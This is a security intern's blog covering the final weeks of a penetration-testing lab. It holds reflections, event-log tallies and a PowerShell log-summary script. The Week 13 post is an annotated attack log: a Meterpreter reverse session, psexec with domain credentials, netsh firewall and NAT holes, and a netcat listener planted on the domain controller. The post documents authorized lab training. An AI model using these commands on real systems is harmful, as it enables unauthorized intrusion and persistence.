Friday, April 23, 2010

SimWitty Internship: Week 15

Well, this week wraps up my pentesting work for Simwitty. I have had a great time doing this work and I have learned quite a bit. In my classes we did some cursory overviews on pentesting, but never delved into it too deeply. This internship has really opened my eyes to the work that is involved in creating a successful penetration test. I think I made some hits and some misses which I would like to point out here.

Hits
  • I learned a huge amount about the Metasploit Framework and its capabilities.
  • I became more familiar with Windows PowerShell and its use in automating tasks.
  • I was enlightened by having to think of all the various aspects of a system that would be changed by nefarious activity on the machine, and thus need to be monitored.
  • I became somewhat familiar with Microsoft SQL Server; how to set it up and work with it.
  • I learned quite a bit concerning virtual machines and networks: what type of communication is possible and how it can be monitored.
  • I got to work on a project with professional people and feel like I made contributions to that project.

Misses
  • I was overambitious on what I could do in a given time frame and the monitoring aspects of the lab suffered for it.
  • I should have set up Snort to use output alert_full along with the database output. My SQL skills are limited (at this point) and I couldn't view the database entries in any way that made sense.
  • Installing IIS on srv-snort was a waste of time since I didn't have time to investigate it.
  • I used the database capabilities of Metasploit to organize and keep track of all the attack sessions but once again I don't know how to turn information in a database into usable information.
  • I should have installed something like the Dradis framework to keep better track of what I was doing and what were the results.
  • Every attack should have been correlated with information showing that it was either detected or not detected. I didn't set my lab up to properly do this.
  • I should have started off by finding a 'pentesting checklist' and adapted it to my lab. Why reinvent the wheel?

Final Thoughts
I think there are a lot of directions that an internship like this could take in the future. My lab was focused on client-side attacks and pivoting, but I didn't really have time to investigate the pivoting aspect closely enough. That could be the target of a future internship. My attack was extremely noisy and obvious; perhaps someone could adapt it by concentrating more on stealth. An internship could possibly be done on creating a 'toolkit' for use once you have breached a host. I installed some programs, but they were obvious and the installation was painful; can we use automation for toolkit installation? The lab network could be created with a "treasure" embedded somewhere within, and the intern's job is to go "treasure hunting". It would also be good to somehow tie in this lab setup with the actual Simwitty appliance, but this may be pushing resource usage on an intern's machine.

I think that my lab setup (and documentation of it) could possibly aid future interns by reducing the time for planning and install. They now have a blueprint to follow (and improve) so that they can spend more time actually doing work within the lab environment. Finally, I want to say thank you to everyone involved with Simwitty. Time is precious, and the fact that you all give up some of yours to make this project work is praiseworthy. I have had a great time working on this project and hopefully can continue to be a contributor once the job issue is taken care of.

Monday, April 19, 2010

SimWitty Internship: Week 14

Monitoring is definitely the hard part. There is so much to watch on just one system. To name just a few examples:
  • File system changes
  • Account/Group changes
  • Directory service changes
  • Registry changes
  • Running processes/services
Now multiply that by the number of systems on the network and you have a real nightmare on your hands. The need for a Security Information Management System is pretty apparent. On my systems, I could see file system changes, account changes, etc. pretty easily. I doubt this would be the case on production systems where all kinds of activity are taking place.

Some clues that bad things were going on were fairly obvious: psexec is plainly visible in the system event log on srv-DC, which logs every time it starts or stops, but records no information regarding what it was doing. Netcat all of a sudden showed up in %SystemRoot% on srv-DC, directories were added to C:\Program Files on wks-XP1, etc. I'm sure that the new event logging system on the Server 2008 OS is much better; the key is being able to find what you need among all the information. The following shows counts and types of activity in just one attack session from the two servers:


srv-DC
ID    Task Category                       Occurrences
----  ----------------------------------  -----------
1102  Log clear                                     1
4624  Logon                                       360
4634  Logoff                                      358
4648  Logon                                         8
4662  Directory Service Access                      3
4672  Special Logon                               284
4768  Kerberos Authentication Service              35
4769  Kerberos Service Ticket Operations          139
4776  Credential Validation                         2
      Total                                      1190

srv-SNORT
ID    Task Category                       Occurrences
----  ----------------------------------  -----------
1102  Log clear                                     1
4624  Logon                                         2
4634  Logoff                                        2
4648  Logon                                         1
4656  Registry                                      6
4658  Other Object Access Events                    5
4662  Other Object Access Events                   10
4663  Registry                                      2
4672  Special Logon                                 2
4688  Process Creation                             26
4689  Process Termination                          27
4696  Process Creation                             17
5156  Filtering Platform Connection               215
5158  Filtering Platform Connection                45
      Total                                       361

I'm surprised that I didn't see any process creation/termination events on srv-DC... I thought I had auditing set properly. When I looked closer, I had auditing set in the GPO for the SimWitty OU, but it apparently didn't affect srv-DC. I'm not sure if it was overridden by the local security policy or the default domain controller policy or what. I guess I should have made sure I turned auditing on everywhere. It's plain to see why they say one of the biggest reasons for breaches is simple misconfiguration. The more complex a system is, the harder it is to be sure you have every little aspect of configuration right.
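The kind of per-ID summary shown in the tables above can be pulled straight from the Security log, and doing so also surfaces the auditing gap: a domain controller with hundreds of logons and zero process creation events is a policy problem, not a quiet host. The following is an added PowerShell example, not part of the original post; it assumes PowerShell 2.0 or later (Get-WinEvent) and an account that can read the remote Security log on the lab hosts named in the post.

```powershell
# Added example (not from the original post). Builds the same
# ID / Task Category / Occurrences table as the ones above from the live
# Security log, and warns when an audit category that any busy session
# should have produced is absent, which is how the missing 4688/4689
# events on srv-DC would have shown up.
# Assumes PowerShell 2.0+ and read access to the Security log on the host.

function Get-SecurityEventSummary {
    param(
        [string]   $ComputerName = $env:COMPUTERNAME,
        [datetime] $Since        = (Get-Date).AddHours(-24)
    )

    # All Security events since the start of the window being reviewed.
    $events = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
        LogName   = 'Security'
        StartTime = $Since
    } -ErrorAction Stop

    # One row per event ID. TaskDisplayName is the "Task Category" column
    # that Event Viewer shows.
    $summary = $events |
        Group-Object -Property Id |
        ForEach-Object {
            New-Object PSObject -Property @{
                ID          = [int]$_.Name
                TaskCat     = $_.Group[0].TaskDisplayName
                Occurrences = $_.Count
            }
        } |
        Sort-Object -Property ID

    # Event IDs that appear in any active session when the matching audit
    # subcategory is really in effect. Hundreds of 4624 logons with no
    # 4688/4689 means Audit Process Creation/Termination did not apply on
    # this host, whatever the GPO for the OU says.
    $expected = @{
        4624 = 'Logon'
        4688 = 'Process Creation'
        4689 = 'Process Termination'
        5156 = 'Filtering Platform Connection'
    }
    foreach ($id in ($expected.Keys | Sort-Object)) {
        if (-not ($summary | Where-Object { $_.ID -eq $id })) {
            Write-Warning ("No {0} ({1}) events on {2}; check the effective policy with 'auditpol /get /category:*' on that host" -f $id, $expected[$id], $ComputerName)
        }
    }

    return $summary
}

# Review the two lab servers from the post, one table per host.
foreach ($host in 'srv-DC', 'srv-SNORT') {
    $summary = Get-SecurityEventSummary -ComputerName $host
    "`n$host"
    $summary | Format-Table -Property ID, TaskCat, Occurrences -AutoSize
    "{0} total" -f ($summary | Measure-Object -Property Occurrences -Sum).Sum
}
```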

Wednesday, April 14, 2010

SimWitty Internship: Week 13 - Addendum

(NOTE: I apologize for the screwed up indentation and formatting in the latter part of this post but the editor for this blog sucks and I don't have time to do all the html by hand)

In my last post I noted that I would continue with the attempted compromise for a couple more days. I'm happy to report that I was able to succeed in getting a hole through the gateway firewall and a netcat listener on an internal workstation, thanks to Mark Russinovich and Psexec. The following is an annotated scrollback buffer from the attack machine wks-Matriux:

/* My scrollback didn't capture everything... this is the tail end of output from ps shortly after a meterpreter session was created */

1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe


meterpreter > shell
Process 1644 created.
Channel 6 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program files\ps>c:\bin\whoami
c:\bin\whoami
TEST\usr1

/* This is the start of my attempts to work with psexec; it took a bit of fiddling to get it right. It is important to use the /accepteula argument on first run, or a window pops up that you can't see or respond to. After that, I don't think it's necessary */

C:\Program files\ps>psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\srv-dc -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

/* I'll leave this first banner in, because Mark deserves credit. I will eliminate the rest though (should have a -q switch?) */

PsExec v1.59 - Execute processes remotely
Copyright (C) 2001-2005 Mark Russinovich
Sysinternals - www.sysinternals.com

Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:

C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 c:\windows\system32\netsh.exe routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

Logon failure: unknown user name or bad password.
PsExec could not start c:\windows\system32\netsh.exe on WKS-XP1:

C:\Program files\ps>psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\192.168.2.1 -u usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

Logon failure: unknown user name or bad password.
PsExec could not start netsh on WKS-XP1:

/* I finally figured out you had to supply the user name in DOMAIN\user format. I cheated a little: since psexec doesn't "pass the hash", I used the real password. I think this is acceptable though, since the attacker already has the password hashes and would probably be able to crack the password. If nothing else, I could have created my own user and supplied the password, added it to the domain admin group, etc. */

C:\Program files\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 whoami

psexec \\srv-DC -u TEST\usr1 -p usr1 whoami

whoami exited on srv-DC with error code 0.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

NAT must be installed first.
netsh exited on WKS-XP1 with error code 0.

/* I am not quite sure why it was telling me this. Maybe because you have to be elevated to run the command, but as you'll see later, it warns me that I am not elevated. */

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp

The following command was not found: advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp.

netsh exited on WKS-XP1 with error code 1.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 netsh "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

The following command was not found: "advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp".

netsh exited on WKS-XP1 with error code 1.

C:\Program files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 "netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp"

The system cannot find the file specified.
Starting netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=
PsExec could not start netsh advfirewall firewall add rule name=jah-netcat dir=in action=allow profile=any localip=any remoteip=192.168.1.100 remoteport=any localport=9999 protocol=tcp on WKS-XP1:

C:\Program files\ps>copy c:\bin\nc.exe .
copy c:\bin\nc.exe .
1 file(s) copied.

C:\Program files\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322

Directory of C:\Program files\ps

04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,678,976 bytes free

/* Here I copied netcat into the current directory, just to make it easier to work with. I then ran an nmap scan on srv-dc to see what ports were available. */

C:\Program files\ps>cd ..
cd ..

C:\Program Files>cd nmap
cd nmap

C:\Program Files\nmap>nmap -sS -F -n -v 192.168.2.1
nmap -sS -F -n -v 192.168.2.1

Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-13 23:08 Central Standard Time
Initiating ARP Ping Scan at 23:08
Scanning 192.168.2.1 [1 port]
Completed ARP Ping Scan at 23:08, 0.85s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:08
Scanning 192.168.2.1 [100 ports]
Discovered open port 53/tcp on 192.168.2.1
Discovered open port 135/tcp on 192.168.2.1
Discovered open port 445/tcp on 192.168.2.1
Discovered open port 49157/tcp on 192.168.2.1
Discovered open port 49155/tcp on 192.168.2.1
Discovered open port 389/tcp on 192.168.2.1
Discovered open port 49154/tcp on 192.168.2.1
Discovered open port 88/tcp on 192.168.2.1
Discovered open port 5357/tcp on 192.168.2.1
Completed SYN Stealth Scan at 23:08, 2.68s elapsed (100 total ports)
Nmap scan report for 192.168.2.1
Host is up (0.027s latency).
Not shown: 91 filtered ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
5357/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
MAC Address: 08:00:27:33:48:CD (Cadmus Computer Systems)

Read data files from: C:\Program Files\nmap
Nmap done: 1 IP address (1 host up) scanned in 4.21 seconds
Raw packets sent: 193 (8490B) | Rcvd: 11 (482B)

C:\Program Files\nmap>cd ..\ps
cd ..\ps

/* In the following few lines, I was trying to copy nc.exe over to srv-dc and execute it. I guess I don't grasp the concept of how psexec uses the -c argument */

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 5357

Can't grab 192.168.2.1:5357 with bind
nc.exe exited on WKS-XP1 with error code 1.

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 -c nc.exe -n -t -L -s 192.168.2.1 -p 49157

Can't grab 192.168.2.1:49157 with bind
nc.exe exited on WKS-XP1 with error code 1.

C:\Program Files\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

/* Here I decided to just try and do a direct copy. When that failed I tried to map the Admin$ share. That also failed, I think because I was using an impersonation token rather than actually running in a process owned by usr1. */

C:\Program Files\ps>copy nc.exe \\svr-DC\admin$
copy nc.exe \\svr-DC\admin$
The network path was not found.
0 file(s) copied.

C:\Program Files\ps>net use z: \\svr-DC\admin$
net use z: \\svr-DC\admin$

The server is not configured for remote administration.

More help is available by typing NET HELPMSG 3743.

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe
1216 svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe


meterpreter > migrate 348
[*] Migrating to 348...
[*] Migration completed successfully.
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>net use * \\192.168.2.1\admin$
net use * \\192.168.2.1\admin$

Drive Z: is now connected to \\192.168.2.1\admin$.
The command completed successfully.

/* It worked after migrating into a process owned by usr1 */

C:\Documents and Settings\usr1.TEST>cd c:\progra~1\ps
cd c:\progra~1\ps

C:\PROGRA~1\ps>copy nc.exe z:\
copy nc.exe z:\
1 file(s) copied.

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

/* huh? */

C:\PROGRA~1\ps>dir
dir
Volume in drive C has no label.
Volume Serial Number is F476-9322

Directory of C:\PROGRA~1\ps

04/13/2010 11:05 PM dir .
04/13/2010 11:05 PM dir ..
04/13/2010 10:41 PM 7,005 Eula.txt
12/29/2004 02:07 PM 61,440 nc.exe
04/13/2010 10:41 PM 143,360 psexec.exe
04/13/2010 10:41 PM 64,072 Pstools.chm
04/13/2010 10:42 PM 960 Pstools_README.TXT
5 File(s) 276,837 bytes
2 Dir(s) 8,279,658,496 bytes free

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 nc.exe -h

The system cannot find the file specified.
PsExec could not start nc.exe on WKS-XP1:

C:\PROGRA~1\ps>psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h

psexec /accepteula \\srv-DC -u TEST\usr1 -p usr1 c:\windows\nc.exe -h

The system cannot find the file specified.
PsExec could not start c:\windows\nc.exe on WKS-XP1:

C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 49157

Can't grab 192.168.2.1:49157 with bind
nc.exe exited on srv-DC with error code 1.

/* Was the AcceptEULA screwing things up? Now it runs on srv-dc */

C:\PROGRA~1\ps>psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999

psexec \\srv-DC -u TEST\usr1 -p usr1 nc.exe -n -t -L -s 192.168.2.1 -p 9999

^C
Terminate channel 1? [y/N] n
[-] Error running command shell: SignalException SIGUSR1

/* In the preceding, netcat started running, but I had no way to interact with it. Ctrl-C tends to end up killing the whole session rather than just the command shell channel. I discovered a way to avoid this on Matriux (Ubuntu): press Alt+F2 and it pops up krunner (I think that's what it's called); click the icon just left of the text box and you get a thing much like Process Explorer. Find metasploit under Konsole (running as ruby), right-click it and send it the SIGUSR1 signal, and it usually puts you back into the meterpreter session. */

meterpreter > rev2self
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe


meterpreter > shell
Process 1564 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>c:\bin\whoami
c:\bin\whoami
TEST\usr1

C:\Documents and Settings\usr1.TEST>exit
meterpreter > rev2self
meterpreter > getuid
Server username: TEST\usr1
meterpreter > shell
Process 1540 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>nc -vv -n 192.168.2.1 9999
nc -vv -n 192.168.2.1 9999
hello
(UNKNOWN) [192.168.2.1] 9999 (?): TIMEDOUT
sent 0, rcvd 0: NOTSOCK

C:\Program Files\ps>hello
'hello' is not recognized as an internal or external command,
operable program or batch file.

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe
344 cmd.exe x86 0 TEST\usr1 C:\WINDOWS\system32\cmd.exe
1776 psexec.exe x86 0 TEST\usr1 C:\PROGRA~1\ps\psexec.exe

meterpreter > kill 1776
Killing: 1776
meterpreter > kill 344
Killing: 344
meterpreter > shell
Process 180 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\usr1.TEST>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>psexec \\server-dc -u TEST\usr1 -p usr1 tasklist

psexec \\server-dc -u TEST\usr1 -p usr1 tasklist

The network path was not found.
Couldn't access server-dc:
Make sure that the default admin$ share is enabled on server-dc.

C:\Program Files\ps>net use * /delete
net use * /delete
You have these remote connections:

Z: \\192.168.2.1\admin$

\\192.168.2.50\IPC$
\\srv-DC\IPC$
Continuing will cancel the connections.
Do you want to continue this operation? (Y/N) [N]:
No valid response was provided.

C:\Program Files\ps>net use Z: /delete
net use Z: /delete
Z: was deleted successfully.

C:\Program Files\ps>psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist

psexec \\svr-dc -u TEST\usr1 -p usr1 tasklist

The network path was not found.
Couldn't access svr-dc:
Make sure that the default admin$ share is enabled on svr-dc.

C:\Program Files\ps>ping -n 2 192.168.2.1
ping -n 2 192.168.2.1

Pinging 192.168.2.1 with 32 bytes of data:

Reply from 192.168.2.1: bytes=32 time=2ms TTL=128
Reply from 192.168.2.1: bytes=32 time=5ms TTL=128

Ping statistics for 192.168.2.1:
Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 2ms, Maximum = 5ms, Average = 3ms

C:\Program Files\ps>exit
meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x86 0
400 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
636 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
688 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
700 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
860 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
876 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
960 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1056 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1116 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1216 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1416 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1740 tlntsvr.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\tlntsvr.exe
348 explorer.exe x86 0 TEST\usr1 C:\WINDOWS\Explorer.EXE
480 alg.exe x86 0 C:\WINDOWS\System32\alg.exe
572 VBoxTray.exe x86 0 TEST\usr1 C:\WINDOWS\system32\VBoxTray.exe
1780 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1560 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1976 svhost77.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\svhost77.exe


meterpreter > exit

[*] Meterpreter session 1 closed. Reason: User exit

/* Things had gotten all screwed up by this point, with zombie processes running on srv-dc and wks-xp1, so I killed the session, killed the zombies manually, and restarted the exploit. */

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
^C[-] Exploit failed:
[*] Exploit completed, but no session was created.
msf exploit(handler) > jobs

Jobs
====

No active jobs.

msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 2 opened (192.168.1.188:31337 -> 192.168.1.250:62571)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 2
[-] The 'stdapi' extension has already been loaded.

meterpreter > shell
Process 1028 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

